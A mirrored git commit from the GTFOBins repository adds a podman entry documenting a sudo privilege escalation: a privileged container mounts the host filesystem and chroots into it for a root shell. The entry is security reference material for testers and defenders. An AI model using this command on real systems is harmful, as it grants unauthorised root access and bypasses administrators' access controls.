mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 06:19:27 +01:00
Add podman
This commit is contained in:
parent
082b26c48f
commit
3eb98d5d33
6
_gtfobins/podman.md
Normal file
6
_gtfobins/podman.md
Normal file
@ -0,0 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
sudo:
|
||||
- description: The resulting is a root shell.
|
||||
code: sudo podman run --rm -it --privileged --volume /:/mnt alpine chroot /mnt sh
|
||||
---
|
Loading…
Reference in New Issue
Block a user